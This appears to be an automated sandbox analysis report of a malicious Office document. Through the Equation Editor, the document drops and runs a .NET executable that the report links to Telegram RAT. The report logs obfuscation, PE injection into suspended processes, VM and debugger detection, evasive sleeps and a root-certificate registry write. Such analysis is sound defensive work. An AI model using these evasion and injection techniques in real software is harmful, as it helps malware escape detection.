Source: gudostrp.exe, 00000004.00000002.462296022.00000000001D2000.00000020.00020000.sdmp	String found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
Source: gudostrp.exe	String found in binary or memory: dotNetProtector
Source: gudostrp.exe, 00000005.00000002.721799916.00000000001D2000.00000020.00020000.sdmp	String found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
Source: gufoxqa[1].exe.2.dr	String found in binary or memory: dotNetProtector
Source: gufoxqa[1].exe.2.dr	String found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_001DEB0F push esp; iretd	4_2_001DEF9A
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_001D67F6 pushfd ; iretd	4_2_001D67FB
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_0030DE0D pushfd ; iretd	4_2_0030DE1E
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_0030DB73 push esp; iretd	4_2_0030DB95
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FA5275 push ebx; iretd	4_2_01FA5276
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB4FE7 push ebx; ret	4_2_01FB501A
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB504D push ebp; retf	4_2_01FB504E
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB4FBE push ebx; ret	4_2_01FB501A
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FBA412 pushad ; retf	4_2_01FBA41E
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FCB713 pushad ; iretd	4_2_01FCB723
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_02035645 pushad ; ret	4_2_02035655
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_041D561B push eax; retf	4_2_041D5626
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_041D7CC7 push ebx; ret	4_2_041D7CCA
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_041D5901 pushad ; ret	4_2_041D5902
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_001DEB0F push esp; iretd	5_2_001DEF9A
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_001D67F6 pushfd ; iretd	5_2_001D67FB
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_002530B5 push esp; retf 0012h	5_2_00253105
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00251B15 push esp; retf 0012h	5_2_00251B69
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_0055626C pushfd ; retf 0018h	5_2_0055626D

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\gudostrp.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 408	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2916	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2096	Thread sleep count: 9569 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2096	Thread sleep count: 171 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364	Thread sleep count: 105 > 30	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Window / User API: threadDelayed 9569

Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Thread delayed: delay time: 30000			Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Code function: 4_2_041DCAE8 CheckRemoteDebuggerPresent,

4_2_041DCAE8

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process token adjusted: Debug			Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Memory written: C:\Users\user\AppData\Roaming\gudostrp.exe base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe			Jump to behavior

Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Queries volume information: C:\Users\user\AppData\Roaming\gudostrp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Queries volume information: C:\Users\user\AppData\Roaming\gudostrp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Telegram RAT

